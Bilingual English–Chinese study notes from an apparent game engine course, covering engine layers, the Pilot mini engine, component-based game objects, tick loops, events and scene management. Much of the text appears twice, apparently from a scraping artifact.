    Function-Dive into Ticks

    png

    ​功能层必须在每个 tick 内完成 Logic、Input、Camera、Motor、Character Controller、Animation、Physics、Render、Network.、I/O、Memory GC、Etc. 的处理。

    Function-Tick the Animation and Renderer

    ​对于动画和渲染器来说……

    png

    • In each tick (over-simplified version)

      在每个刻度中(过于简化的版本)

      • Fetch animation frame of character

        获取角色的动画帧

      • Drive the skeleton and skin of character

        驱动角色的骨骼和皮肤

      • Renderer process all rendering jobs in an iteration of render tick for each frame

        渲染器在每帧的渲染标记迭代中处理所有渲染作业

    Function-Heavy-duty Hotchpotch

    ​重型大杂烩

    png

    • Function Layer provides major function modules for the game engine

      功能层为游戏引擎提供主要功能模块

      • Object system (HUGE)

        对象系统(巨大)

    • Game Loop updates the systems periodically

      游戏循环定期更新系统

      • Game Loop is the key of reading codes of game engines

        游戏循环是读取游戏引擎代码的关键

    • Blur the boundary between engine and game

      模糊引擎和游戏之间的界限

      • Camera, character and behavior

        镜头、角色和行为

      • Design extendable engine APl for programmer

        为程序员设计可扩展引擎 APl

    Function-Multi-Threading

    ​多线程

    png

    • Multi-core processors become the mainstream

      多核处理器成为主流

      • Many systems in game engine are built for parallelism

        游戏引擎中的许多系统都是为并行性而构建的

    Core-Math Library

    png

    ​一个数学库,实现渲染之类的功能。

    Core-Math Effciency

    png

    ​核心层要讲究效率,比如 C++ 的 STL 库中的 1/sqrt(x) 速度慢,要换一种近似但是快速的算法。

    Core -Data Structure and Containers

    ​处理数据结构

    png

    • Vectors, maps, trees, etc.

      矢量,图,树等

    • Customized outperforms STL

      定制优于 STL 的算法

    • Avoid FRAGMENT memory!

      避免碎片内存!


    • Skeleton tree

      骨架树

    • Animation frame sequence

      动画帧序列

    Core-Memory Management

    ​核心内存管理

    • Major bottlenecks of game engine performance

      游戏引擎性能的主要瓶颈

      • Memory Pool / Allocator

        内存池/分配器

      • Reduce cache miss

        减少缓存未命中

      • Memory alignment

        内存对齐

    • Polymorphic Memory Resource (PMR)

      多态内存资源(PMR)

    png

    • Cache locality/diffusion

      缓存局部性/扩散

    • Memory Arena

      内存池


    • Put data together

      将数据放在一起

    • Access data in order

      按顺序访问数据

    • Allocate and de-allocate as a block

      作为块分配和取消分配

    Core-Foundation of Game Engine

    ​游戏引擎核心基础

    png

    • Core layers provide utilities needed in various function modules

      核心层提供各种功能模块所需的实用程序

    • Super high performance design and implementation

      超高性能设计与实现

    • High standard of coding

      高标准的编码

    Platform-Target on Different Platform

    ​不同平台上的平台目标

    Compatibility of different platforms, provides platform-independentservices and information for upper layers

    ​不同平台的兼容性,为上层提供平台无关的服务和信息

    png

    • File system

      文件系统

      • Path: Slash/backslash, Environment variables

        路径:斜杠/反斜杠、环境变量

      • Directory Traversal

        目录遍历

    Platform-Graphics APl

    ​图形 API

    Render Hardware Interface (RHl)

    ​渲染硬件接口 (RHl)

    • Transparent different GPU architectures and SDK

      透明的不同 GPU 架构和 SDK

    • Automatic optimization of target platforms

      自动优化目标平台

    png

    ​在底层 API 上用 C++ 的虚函数再封装一层。

    Platform-Hardware Architecture

    ​硬件架构

    png

    ​平台层要适应不同种硬件架构。

    Tool-Allow Anyone to Create Game

    ​允许任何人创建游戏

    png

    Unleash the Creativity

    ​释放创造力。创造对游戏开发者友好的开发环境。

    • Build upon game engine

      基于游戏引擎构建

    • Create, edit and exchange game play assets

      创建、编辑和交换游戏资产

    Flexible of coding languages

    ​灵活的编码语言

    Tool-Digital Content Creation

    png

    Asset Conditioning Pipeline

    • 资产调整管道

    Why Layered Architecture?

    png

    Decoupling and Reducing Complexity

    ​解耦并降低复杂性

    • Lower layers are independent from upper layers

      下层独立于上层

    • Upper layers don’t know how lower layers are implemented

      上层不知道下层是如何实现的

    Response for Evolving Demands

    ​响应不断变化的需求

    • Upper layers evolve fast, but lower layers are stable

      上层发展很快,但下层稳定

    Mini Engine-Pilot

    ​课程特意设计的小游戏引擎。

    Neat PILOT Engine

    ​整洁的 PILOT 引擎

    png

    Build by C /C++

    ​由 C/C++ 构建

    • Runtime: ~13,000 lines

      运行时间:约 13,000 行

    • Editor: ~2,000 lines

      编辑器:约 2,000 行

    Follow Engine Layers

    ​遵循引擎分层

    • Source code still improving

      源代码仍在改进

    Support Platform

    ​支持平台

    • Windows
    • Linux
    • Macos (working on M1)

    PlLOT Editor and Runtime

    ​编辑器和运行时

    Basic Editing

    ​基础编辑

    • Add/Delete objects

      添加/删除对象

    • Move/Scale/Rotate obiects

      移动/缩放/旋转对象

    Simple Functions

    ​简单的功能

    • Character control

      角色控制

    • Camera

      相机

    png

    ​这个游戏引擎还引入了 ECS。

    第三节:如何构建游戏世界

    How to build a game world?

    • What does a game world consist of?

      游戏世界由什么组成?

    • How should we describe these things?

      我们该如何描述这些事情呢?

    • How are these things organized?

      这些东西是如何组织的?

    Dynamic Game Objects

    png

    ​假设我想创建一个射击游戏场景,我设计一些可以随游戏进程而改变的 GameObject(GO)。

    Static Game Objects

    png

    ​再设计一些不可随游戏进程改变(游戏生成时长啥样,就是啥样)的 GO。

    Environments

    png

    ​由地编生成的环境。

    Other Game Objects

    png

    ​还有一些或许不可见的东西,比如空气墙,触发区域,特定规则,导航网络等。

    Everything is a Game Object

    png

    ​这些东西都可称之为 Game Object(GO)。

    How to Describe a Game Object?

    png

    ​我们该如何描述一个 GO 呢?假如,我们想要一个 drone 无人机。

    How Do We Describe a Drone in Reality?

    ​现实环境中,如何描述一个无人机?

    ​Properties and behaviors!

    • Shape (property)

      形状(属性)

    • Position (property)

      位置(属性)

    • Move (behavior)

      移动(行为)

    • Capacity of battery (property)

      电池容量(属性)

    • Etc.

    Game Object

    png

    ​将 property 用变量定义,behavior 用函数定义。

    class Drone
    {
    public:
    /* Properties */
    Vector3 position;
    float health;
    float fuel;
    ...
    /* Bebavior */
    void move();
    void scout();
    ...
    };

    Drone vs. Armed Drone

    png

    ​这个时候我们想设计一个战斗无人机,比起一般无人机,多了 ammo 弹药的 property 和 fire 的 behaviour。

    Game Object

    • Inheritance

      继承

    png

    ​使用集成的方法,让 ArmeDrone 继承 Drone 类,然后写上 ammo 弹药的 property 和 fire 的 behaviour 的定义。

    No Perfect Classification in the Game World!

    png

    ​但当继承派生的类变得复杂时,简单的继承就不太好使了。

    Component Base

    png

    png

    • Component Composition in the Real World

      现实世界中的组件构成

    ​将一个实体拆分成各个组件再操作!

    Components of a Drone

    png

    ​对于我们定义的无人机,我们将它拆分成多个 components:

    • Transform 变换
    • Motor 发动机
    • Model 模型
    • AI
    • Animations 动画
    • Physics 物理

    png

    Component

    • Drone vs. Armed Drone

    png

    ​此时,如果我们在无人机的基础上想要改成战斗机,只需修改其中的部分 components 即可。

    Components in Commercial Engines

    png

    ​在 Unity 和 UE 两大商业引擎中,也使用了 components 的思想

    Takeaways

    • Everything is a game object in the game world

      游戏世界中的一切都是游戏对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    How to Make the World Alive?

    ​如何让世界运行起来?

    Object-based Tick

    png

    ​Tick 相当于游戏世界中的普朗克时间。

    ​基于对象的 tick,每个 Tick 中分别处理好各个 GO 的逻辑。

    Component-based Tick

    png

    ​基于组件的 Tick,依次处理好各个 component 的逻辑。

    Object-based Tick vs. Component-based Tick

    png

    • Object-based tick

      基于对象的刻度

      • Simple and intuitive

        简单直观

      • Easy to debug

        易于调试

    png

    • Component-based tick

      基于组件的刻度

      • Parallelized processing

        并行处理

      • Reduced cache miss

        减少缓存未命中

    ​更高效!

    How to Explode an Ammo in a Game?

    ​如何处理游戏中弹药爆炸的逻辑?

    Hardcode

    png

    ​给炸弹爆炸时写一个函数,判断周围 GO 的类型然后逐个写逻辑。

    Events

    png

    ​炸弹爆炸时分发一个消息,各个 GO 接收到消息后执行逻辑。

    • Message sending and handling

      消息发送和处理

    • Decoupling event sending and handling

      解耦事件发送和处理

    ​这么做耦合度低,被普遍采用。

    Events Mechanism in Commercial Engines

    ​商业引擎中的事件机制

    png

    ​Unity 和 UE 中都普遍用到了这样的机制。

    How to Manage Game Objects?

    ​如何管理 GO?

    Scene Management

    png

    • Game objects are managed in a scene

      游戏对象在场景中管理

    • Game object query

      游戏对象查询

      • By unique game object lD.

        通过独特的游戏对象 ID。

      • By object position

        按物体位置

    png

    ​假设一个炮弹爆炸派发了一个事件,要让游戏中的所有 GO 接受这个事件并处理(是否在爆炸范围内),性能太低,需要作出一定的空间划分。

    • Simple space segmentation

      简单的空间划分

    png

    • Segmented space by object clusters

      按对象簇分割空间

    • Hierarchical segmentation

      分层细分

    png

    • Spatial Data Structures

      空间数据结构

    png

    ​划分空间的各个算法:

    • Bounding Volume Hierarchies (BVH)

      边界体积层次结构 (BVH)

    • Binary Space Partitioning (BSP)

      二进制空间分区(BSP)

    • Octree

      八叉树

    • Scene Graph

      场景图

    Takeaways

    • Everything is an object

      一切都是对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    • States of game objects are updated in tick loops

      游戏对象的状态在滴答循环中更新

    • Game objects interact with each other via event mechanism

      游戏对象通过事件机制相互交互

    • Game objects are managed in a scene with efficient strategies

      游戏对象在场景中以有效的策略进行管理

    png

    ​对于一些存在父子层级关系的 GO。

    png

    ​Animation、Motor 和 Physics 三个 components 相互影响,如果互相派发消息,性能会不佳。

    png

    Immediate Event Sending or not

    ​是否立即发送事件

    ​可以设计一个“邮局”,收发消息由这个邮局控制,提升性能!

    ]]>
    + 资源

    课程

    第一节:游戏引擎导论

    OVERVIEW OF GAME ENGINE

    Game: Miracle of Modern computer Technology

    ​游戏:现代计算机技术的奇迹

    Game Engine: The Diamond on the crown

    ​游戏引擎:皇冠上的钻石

    ​游戏引擎中所涉及的技术太多了。

    Topic 1: WHY WE NEED TO LEARN

    Game Engine is the Foundation of Virtual World

    ​游戏引擎是虚拟世界的基础

    游戏引擎除了做游戏,还可以干这些事情:

    • METAHUMAN

      拟人

    • CINEMATIC & ANIMATION

      电影与动画

    • SIMULATION

      模拟(军事)

    • DIGITAL TWIN

      数字孪生

    Topic 2: HISTORY OF GAME ENGINE

    Early Age of Video Games

    png

    ​早期游戏:红白机,超级马里奥,坦克大战,魂斗罗。

    Father of Game Engine

    png

    • John carmack

    John conceived and executed a new way oforganizing the components of computer games by separating execution of core functionality by thegame engine from the creative assets that filled the play space and content of a specific game title.

    ​约翰构思并实施了一种组织计算机游戏组件的新方法,将游戏引擎执行的核心功能与填充特定游戏标题的游戏空间和内容的创意资产分开。

    ​这个人被称之为游戏引擎之父,让不同游戏间代码可以互用。

    • Wolfenstein 3D (1992)

    “Father of 3D shooters” and first demonstration of game engine application

    ​“3D 射击之父”暨游戏引擎应用首次演示

    • Doom

    png

    Along with its predecessor Wolfenstein 3D, Doom defined the FPS genre and inspired numerous similar games, often called the Doom clones. lt was the first online distribution game, and it pioneered technologies including 3D graphics, networked multiplayer gaming, and support for custom modifications via packaged WAD files.

    ​与其前身《德军总部 3D》一起,《毁灭战士》定义了 FPS 类型,并启发了许多类似的游戏,通常被称为《毁灭战士》克隆游戏。它是第一款在线发行游戏,它开创了包括 3D 图形、网络多人游戏以及通过打包的 WAD 文件进行自定义修改的支持等技术。

    • Engine License

    1994, ID Software license Doom engine to Raven, which built a successful game ShadowCaster based on it.

    ​1994 年,ID Software 将 Doom 引擎授权给 Raven,Raven 基于它打造了一款成功的游戏 ShadowCaster。

    Early Age of Modern Game Engine

    png

    • Quake

    • Unlike the Doom Engine, the Quake engine offered full real-time 3D rendering and supported early 3D acceleration through OpenGL.

      与 Doom 引擎不同,Quake 引擎提供完整的实时 3D 渲染,并通过 OpenGL 支持早期 3D 加速。

    png

    A game engine is a software framework primarily designed for the development of video games, which normally includes relevant libraries and support programs

    ​游戏引擎是主要为视频游戏开发而设计的软件框架,通常包括相关的库和支持程序。

    Family of Game Engines

    png

    游戏引擎有三大类:

    • Commercial Engine

      商用引擎

    • In-house Engine

      内部引擎(寒霜等,不公开)

    • Free Engine

      免费引擎

    Middleware of Game Engine

    png

    ​游戏引擎中可能用到的框架,用于解决某些特定问题。

    Topic 3: WHAT ISGAME ENGINE

    What’s Game Engine?

    ​A game engine is a software framework primarily designed for the development of video games, and generally includes relevant libraries and support programs. The “engine” terminology is similar to the term “software engine” used in the software industry.
    ​Game engine can also refer to the development software utilizing this framework, typically offering a suite of tools and features for developing games.
    ​Developers can use game engines to construct games for video game consoles and other types of computers. The core functionality typically provided by a game engine may include a rendering engine ( “renderer” ) for 2D or 3D graphics,a physics engine or collision detection (and collision response), sound,scripting, animation, artificial intelligence, networking, streaming, memory management, threading, localization support,scene graph, and video support for cinematics. Game engine implementers often economize on the process of game development by reusing/adapting, in large part,the same game engine to produce different games or to aid in porting games to multiple platforms.

    ​游戏引擎是主要为视频游戏开发而设计的软件框架,一般包括相关的库和支持程序。“引擎”术语类似于软件行业中使用的术语“软件引擎”。
    ​游戏引擎也可以指利用该框架的开发软件,通常提供一套用于开发游戏的工具和功能。
    ​开发人员可以使用游戏引擎为视频游戏机和其他类型的计算机构建游戏。游戏引擎通常提供的核心功能可能包括用于 2D 或 3D 图形的渲染引擎(“渲染器”)、物理引擎或碰撞检测(和碰撞响应)、声音、脚本、动画、人工智能、网络、流媒体、内存管理、线程、本地化支持、场景图和电影视频支持。游戏引擎实现者通常通过在很大程度上重用/改编相同的游戏引擎来制作不同的游戏或帮助将游戏移植到多个平台,从而节省游戏开发的过程。

    ​Wiki 里对游戏引擎的解释十分复杂。

    Our Definition: What’s Game Engine?

    • Technology foundation of the Matrix

      黑客帝国的技术基础

    • Productivity tools of creation

      创造的生产力工具

    • The Art of complexity

      复杂性的艺术

    Infinite Details of the World

    ​天地有大美而不言

    Complexity of Simulation by 0/1

    png

    ​用计算机的 0 和 1 表示这些东西,太难了

    Game Engine is Far Beyond Rendering

    png

    ​渲染只是游戏引擎中的一小部分。

    God with Limited Power in Realtime

    ​上帝所创造的真实世界拥有无尽的算力。计算机所创造的世界受算力影响,需要在 1/帧率 时间内完成计算,因此优化是一个大问题。

    Toolchain for Creators

    png

    ​给创造者的工具——游戏引擎。

    Developer Platform

    • For Programmer

      对于程序员

      • Expandable APl interfaces allow programmers to define various of gameplay without changing the core.

        可扩展的 APl 接口允许程序员在不改变核心的情况下定义各种游戏玩法。

    • For Studio

      对于工作室

      • Collaborate hundreds of developers with different work streams smoothly together.

        数百名具有不同工作流程的开发人员顺利协作。

    Update the Engine in the Air

    ​游戏引擎更新的过程中要保证兼容性,相当于在飞行过程中更换飞机零件。

    Yes, We Are…

    ​是的,我们是…

    The Creator and Operator of This Ugly Monster.

    ​这个丑陋怪物的创造者和操纵者。

    But Future Will be Even More Difficult.

    ​但未来会更加困难。

    Topic 4: HOW TO STUDY

    Game Engine Technology Covers All Major Area of Computer Science

    ​游戏引擎技术涵盖计算机科学的所有主要领域。

    png

    ​多读书多看报。

    Focus on the Main Road by Building the Framework

    ​游戏引擎领域范围太广了,课程只按主路进行。

    Topic 5: COURSE CONTENT

    Basic Elements

    png

    • Engine structure and layers

      引擎结构和层数

    • Data organization and management

      数据组织和管理

    png

    Rendering

    png

    • Model, material, shader, texture
    • Light and shadow
    • Render pipeline
    • Sky, terrain, etc

    Animation

    png

    • Basic concepts of animation

      动画的基本概念

    • Animation structure and pipeline

      动画结构和流程

    Physics

    png

    • Basic concepts of Physics System

      物理系统的基本概念

    • Gameplay applications

      游戏应用程序

    • Performance optimization

      性能优化

    Gameplay

    png

    • Event System

      事件系统

    • Scripts System

      脚本系统

    • Graph Driven

      图驱动(蓝图)

    Misc. Systems

    ​杂项系统

    png

    • Effects

    • Navigation

    • Camera

    Toolchain

    ​工具链

    png

    • C++ Reflection
      Expose variables and functions used in the editor. That is, the game creation tool will use a form of reflection (or similar) on the code provided by the developers, which then allows it to expose parts of it in editors for designers.

      公开编辑器中使用的变量和函数。也就是说,游戏创建工具将对开发人员提供的代码使用某种形式的反射(或类似形式),然后允许它在编辑器中向设计人员公开部分代码

    • Data Schema
      A data schema is the formal description of the structures which a system is working with.

      数据模式是系统正在使用的结构的正式描述。

    Online Gaming

    png

    • Lockstep synchronization

      锁步同步

    • State synchronization

      状态同步

    • Consistency

      一致性

    Advanced Technology

    png

    • Motion Matching

      动作匹配

      Motion Matching is a simple yet powerful way of animating characters in games. Compared to other methods, it doesn’t require very much manual work once you have a basic set-up. there is no need to structure clips in graphs, to carefully cut or synchronize them, or to explicitly create new transitions between status.

      动作匹配是一种简单而强大的游戏角色动画方式。与其他方法相比,一旦完成基本设置,它就不需要太多手动工作。无需在图表中构造剪辑、仔细剪切或同步它们,或显式地在状态之间创建新的转换。

    • Procedural Content Generation (PCG)

      程序内容生成(PCG)

      PCG is a method of creating data algorithmically as opposed to manually, typically through a combination of human-generated assets and algorithms coupled with computer-generated randomness and processing power.

      PCG 是一种通过算法而不是手动创建数据的方法,通常通过将人类生成的资产和算法与计算机生成的随机性和处理能力相结合。

    png

    • Data-Oriented Programming (DOP)

      面向数据的编程(DOP)

      DOP is an exciting new paradigm that eliminates the usual complexity caused by combining data and code into objects and classes. In DOP, you maintain application data in persistent generic data structures separated from the program’s code. You use general-purpose functions to manipulate the data without mutating it. This approach rids your applications of state-related bugs and makes your code much easier to understand and maintain.

      DOP 是一个令人兴奋的新范例,它消除了将数据和代码组合到对象和类中通常带来的复杂性。在 DOP 中,您可以在与程序代码分离的持久通用数据结构中维护应用程序数据。您可以使用通用函数来操作数据而不改变数据。这种方法可以消除应用程序中与状态相关的错误,并使您的代码更易于理解和维护。

    • Job System
      A job system manages multithreaded code by creating jobs instead of threads.

      作业系统通过创建作业而不是线程来管理多线程代码。

    png

    • Lumen
      Unreal Engine 5’ s new fully dynamic global illumination and reflections system that is designed for next-generation consoles. lt renders diffuse interreflection with infinite bounces and indirect specular reflections in large, detailed environments at scales ranging from millimeters to kilometers.

      虚幻引擎 5 专为下一代游戏机设计的全新全动态全局照明和反射系统。它可以在大型、详细的环境中以毫米到公里的尺度呈现具有无限反射和间接镜面反射的漫反射。

    • Nanite
      Unreal Engine 5’ s new virtualized geometry system which uses a new internal mesh format and rendering technology to render pixel scale detail and high object counts.

      虚幻引擎 5 的新虚拟几何系统使用新的内部网格格式和渲染技术来渲染像素级细节和高对象数量。

    Topic 6: COURSE LOGISTICS

    png

    ​参考书籍:Jason Gregroy,“Game Engine Architecture”, 3rd or later editions

    第二节:引擎架构分层

    A Glance of Game Engine Layers

    Sea of Codes

    Where to begin?

    ​游戏引擎架构十分复杂,该从何开始研究?

    png

    ​课程认为游戏引擎可以分为五层,自上而下依次是:

    • Tool Layer

      工具层

    • Function Layer

      功能层

    • Resource Layer

      资源层

    • Core Layer

      核心层

    • Platform Layer

      平台层

    Tool Layer:给游戏开发者的平台

    Chain of Editors

    png

    Function Layer:实现游戏的各种基础功能

    Make lt Visible, Movable and Playable

    ​使游戏内容可见、可移动和可播放

    png

    • Animation

      动画

    • Physics

      物理

    • Rendering

      渲染

    • Camera, HUD and Input

      相机,HUD 和输入

    ​HUD 是 Heads-Up Display 的缩写,指的是游戏界面上用来显示各种信息的部分,通常位于屏幕的边缘或角落。HUD 可以包括玩家的健康值、能量条、地图、任务目标、物品栏等信息,以帮助玩家更好地了解游戏情况并进行操作。HUD 的设计可以根据游戏类型和风格而有所不同,有些游戏甚至允许玩家自定义 HUD 以满足其个人喜好。

    • Script, FSM and Al

      脚本,有限状态机和人工智能

    Resource Layer:管理游戏各种 assets。

    Data and Files

    png

    ​有多种文件格式需要游戏引擎去读取。

    Core Layer:类似操作系统,需要管理线程、内存等资源分配。

    Swiss Knife of Game Engine

    ​游戏引擎的瑞士刀

    png

    Platform Layer:让游戏编写者写出的游戏能够在不同平台中运行。

    Launch on Different Platforms

    ​在不同平台上启动

    png

    3rd Parity Libraries:第三方库

    Middleware and 3rd Party Libraries

    png

    ​市面上已有多种轮子以实现某些功能。

    Explore Game Engine Layers

    Practice is the Best Way to Learn

    ​实践是学习的最好办法!我们从一个案例开始。

    png

    Simple Animated Character Challenge

    ​简单的动画角色挑战。我想设计一个动画系统,要求如下:

    • Create, animate and render a character

      创建、动画和渲染角色

    • Playable on selected hardware platforms

      可在选定的硬件平台上播放

    Resource-How to Access My Data

    资源 - 如何访问我的数据

    png

    • Offline Resource lmporting

      线下资源导入

    • Unify file access by defining a meta asset file format (ie.ast)

      通过定义元资产文件格式(即 .ast)来统一文件访问(对于 PSD、MAX、MAYA 这种类型的文件,可能包含了大量对游戏引擎来说的无用信息,应该去除。)

    • Assets are faster to access by importing preprocess

      通过导入预处理可以更快地访问资产

    • Build a composite asset file to refer to all resources

      构建复合资产文件以引用所有资源

    • GUlD is an extra protection of reference

      GUID 是对参考的额外保护

    Resource-Runtime Asset Manager

    ​资源运行时资产管理器

    png

    Runtime Resource Management

    ​运行时资源管理(游戏运行时需要加载/移除哪些资源)

    • A virtual file system to load/unload assets by path reference

      通过路径引用加载/卸载资源的虚拟文件系统

    • Manage asset lifespan and reference by handle system

      通过手柄系统管理资产寿命和参考

    Resource-Manage Asset Life Cycle

    ​资源管理资产生命周期

    png

    Memory management for Resources - life cycle

    ​资源的内存管理 - 生命周期

    • Different resources have different life cycles

      不同的资源有不同的生命周期

    • Limited memory requires release of loaded resources when possible

      有限的内存需要尽可能释放已加载的资源

    • Garbage collection and deferred loading is critical features

      垃圾收集和延迟加载是关键功能

    Function-How to Make the World Alive

    png

    ​功能层有这么多东西需要去实现。

    Function-Dive into Ticks

    png

    ​功能层必须在每个 tick 内完成 Logic、Input、Camera、Motor、Character Controller、Animation、Physics、Render、Network.、I/O、Memory GC、Etc. 的处理。

    Function-Tick the Animation and Renderer

    ​对于动画和渲染器来说……

    png

    • In each tick (over-simplified version)

      在每个刻度中(过于简化的版本)

      • Fetch animation frame of character

        获取角色的动画帧

      • Drive the skeleton and skin of character

        驱动角色的骨骼和皮肤

      • Renderer process all rendering jobs in an iteration of render tick for each frame

        渲染器在每帧的渲染标记迭代中处理所有渲染作业

    Function-Heavy-duty Hotchpotch

    ​重型大杂烩

    png

    • Function Layer provides major function modules for the game engine

      功能层为游戏引擎提供主要功能模块

      • Object system (HUGE)

        对象系统(巨大)

    • Game Loop updates the systems periodically

      游戏循环定期更新系统

      • Game Loop is the key of reading codes of game engines

        游戏循环是读取游戏引擎代码的关键

    • Blur the boundary between engine and game

      模糊引擎和游戏之间的界限

      • Camera, character and behavior

        镜头、角色和行为

      • Design extendable engine APl for programmer

        为程序员设计可扩展引擎 APl

    Function-Multi-Threading

    ​多线程

    png

    • Multi-core processors become the mainstream

      多核处理器成为主流

      • Many systems in game engine are built for parallelism

        游戏引擎中的许多系统都是为并行性而构建的

    Core-Math Library

    png

    ​一个数学库,实现渲染之类的功能。

    Core-Math Effciency

    png

    ​核心层要讲究效率,比如 C++ 的 STL 库中的 1/sqrt(x) 速度慢,要换一种近似但是快速的算法。

    Core -Data Structure and Containers

    ​处理数据结构

    png

    • Vectors, maps, trees, etc.

      矢量,图,树等

    • Customized outperforms STL

      定制优于 STL 的算法

    • Avoid FRAGMENT memory!

      避免碎片内存!


    • Skeleton tree

      骨架树

    • Animation frame sequence

      动画帧序列

    Core-Memory Management

    ​核心内存管理

    • Major bottlenecks of game engine performance

      游戏引擎性能的主要瓶颈

      • Memory Pool / Allocator

        内存池/分配器

      • Reduce cache miss

        减少缓存未命中

      • Memory alignment

        内存对齐

    • Polymorphic Memory Resource (PMR)

      多态内存资源(PMR)

    png

    • Cache locality/diffusion

      缓存局部性/扩散

    • Memory Arena

      内存池


    • Put data together

      将数据放在一起

    • Access data in order

      按顺序访问数据

    • Allocate and de-allocate as a block

      作为块分配和取消分配

    Core-Foundation of Game Engine

    ​游戏引擎核心基础

    png

    • Core layers provide utilities needed in various function modules

      核心层提供各种功能模块所需的实用程序

    • Super high performance design and implementation

      超高性能设计与实现

    • High standard of coding

      高标准的编码

    Platform-Target on Different Platform

    ​不同平台上的平台目标

    Compatibility of different platforms, provides platform-independentservices and information for upper layers

    ​不同平台的兼容性,为上层提供平台无关的服务和信息

    png

    • File system

      文件系统

      • Path: Slash/backslash, Environment variables

        路径:斜杠/反斜杠、环境变量

      • Directory Traversal

        目录遍历

    Platform-Graphics APl

    ​图形 API

    Render Hardware Interface (RHl)

    ​渲染硬件接口 (RHl)

    • Transparent different GPU architectures and SDK

      透明的不同 GPU 架构和 SDK

    • Automatic optimization of target platforms

      自动优化目标平台

    png

    ​在底层 API 上用 C++ 的虚函数再封装一层。

    Platform-Hardware Architecture

    ​硬件架构

    png

    ​平台层要适应不同种硬件架构。

    Tool-Allow Anyone to Create Game

    ​允许任何人创建游戏

    png

    Unleash the Creativity

    ​释放创造力。创造对游戏开发者友好的开发环境。

    • Build upon game engine

      基于游戏引擎构建

    • Create, edit and exchange game play assets

      创建、编辑和交换游戏资产

    Flexible of coding languages

    ​灵活的编码语言

    Tool-Digital Content Creation

    png

    Asset Conditioning Pipeline

    • 资产调整管道

    Why Layered Architecture?

    png

    Decoupling and Reducing Complexity

    ​解耦并降低复杂性

    • Lower layers are independent from upper layers

      下层独立于上层

    • Upper layers don’t know how lower layers are implemented

      上层不知道下层是如何实现的

    Response for Evolving Demands

    ​响应不断变化的需求

    • Upper layers evolve fast, but lower layers are stable

      上层发展很快,但下层稳定

    Mini Engine-Pilot

    ​课程特意设计的小游戏引擎。

    Neat PILOT Engine

    ​整洁的 PILOT 引擎

    png

    Build by C /C++

    ​由 C/C++ 构建

    • Runtime: ~13,000 lines

      运行时间:约 13,000 行

    • Editor: ~2,000 lines

      编辑器:约 2,000 行

    Follow Engine Layers

    ​遵循引擎分层

    • Source code still improving

      源代码仍在改进

    Support Platform

    ​支持平台

    • Windows
    • Linux
    • Macos (working on M1)

    PlLOT Editor and Runtime

    ​编辑器和运行时

    Basic Editing

    ​基础编辑

    • Add/Delete objects

      添加/删除对象

    • Move/Scale/Rotate obiects

      移动/缩放/旋转对象

    Simple Functions

    ​简单的功能

    • Character control

      角色控制

    • Camera

      相机

    png

    ​这个游戏引擎还引入了 ECS。

    第三节:如何构建游戏世界

    How to build a game world?

    • What does a game world consist of?

      游戏世界由什么组成?

    • How should we describe these things?

      我们该如何描述这些事情呢?

    • How are these things organized?

      这些东西是如何组织的?

    Dynamic Game Objects

    png

    ​假设我想创建一个射击游戏场景,我设计一些可以随游戏进程而改变的 GameObject(GO)。

    Static Game Objects

    png

    ​再设计一些不可随游戏进程改变(游戏生成时长啥样,就是啥样)的 GO。

    Environments

    png

    ​由地编生成的环境。

    Other Game Objects

    png

    ​还有一些或许不可见的东西,比如空气墙,触发区域,特定规则,导航网络等。

    Everything is a Game Object

    png

    ​这些东西都可称之为 Game Object(GO)。

    How to Describe a Game Object?

    png

    ​我们该如何描述一个 GO 呢?假如,我们想要一个 drone 无人机。

    How Do We Describe a Drone in Reality?

    ​现实环境中,如何描述一个无人机?

    ​Properties and behaviors!

    • Shape (property)

      形状(属性)

    • Position (property)

      位置(属性)

    • Move (behavior)

      移动(行为)

    • Capacity of battery (property)

      电池容量(属性)

    • Etc.

    Game Object

    png

    ​将 property 用变量定义,behavior 用函数定义。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    class Drone
    {
    public:
    /* Properties */
    Vector3 position;
    float health;
    float fuel;
    ...
    /* Bebavior */
    void move();
    void scout();
    ...
    };

    Drone vs. Armed Drone

    png

    ​这个时候我们想设计一个战斗无人机,比起一般无人机,多了 ammo 弹药的 property 和 fire 的 behaviour。

    Game Object

    • Inheritance

      继承

    png

    ​使用集成的方法,让 ArmeDrone 继承 Drone 类,然后写上 ammo 弹药的 property 和 fire 的 behaviour 的定义。

    No Perfect Classification in the Game World!

    png

    ​但当继承派生的类变得复杂时,简单的继承就不太好使了。

    Component Base

    png

    png

    • Component Composition in the Real World

      现实世界中的组件构成

    ​将一个实体拆分成各个组件再操作!

    Components of a Drone

    png

    ​对于我们定义的无人机,我们将它拆分成多个 components:

    • Transform 变换
    • Motor 发动机
    • Model 模型
    • AI
    • Animations 动画
    • Physics 物理

    png

    Component

    • Drone vs. Armed Drone

    png

    ​此时,如果我们在无人机的基础上想要改成战斗机,只需修改其中的部分 components 即可。

    Components in Commercial Engines

    png

    ​在 Unity 和 UE 两大商业引擎中,也使用了 components 的思想

    Takeaways

    • Everything is a game object in the game world

      游戏世界中的一切都是游戏对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    How to Make the World Alive?

    ​如何让世界运行起来?

    Object-based Tick

    png

    ​Tick 相当于游戏世界中的普朗克时间。

    ​基于对象的 tick,每个 Tick 中分别处理好各个 GO 的逻辑。

    Component-based Tick

    png

    ​基于组件的 Tick,依次处理好各个 component 的逻辑。

    Object-based Tick vs. Component-based Tick

    png

    • Object-based tick

      基于对象的刻度

      • Simple and intuitive

        简单直观

      • Easy to debug

        易于调试

    png

    • Component-based tick

      基于组件的刻度

      • Parallelized processing

        并行处理

      • Reduced cache miss

        减少缓存未命中

    ​更高效!

    How to Explode an Ammo in a Game?

    ​如何处理游戏中弹药爆炸的逻辑?

    Hardcode

    png

    ​给炸弹爆炸时写一个函数,判断周围 GO 的类型然后逐个写逻辑。

    Events

    png

    ​炸弹爆炸时分发一个消息,各个 GO 接收到消息后执行逻辑。

    • Message sending and handling

      消息发送和处理

    • Decoupling event sending and handling

      解耦事件发送和处理

    ​这么做耦合度低,被普遍采用。

    Events Mechanism in Commercial Engines

    ​商业引擎中的事件机制

    png

    ​Unity 和 UE 中都普遍用到了这样的机制。

    How to Manage Game Objects?

    ​如何管理 GO?

    Scene Management

    png

    • Game objects are managed in a scene

      游戏对象在场景中管理

    • Game object query

      游戏对象查询

      • By unique game object lD.

        通过独特的游戏对象 ID。

      • By object position

        按物体位置

    png

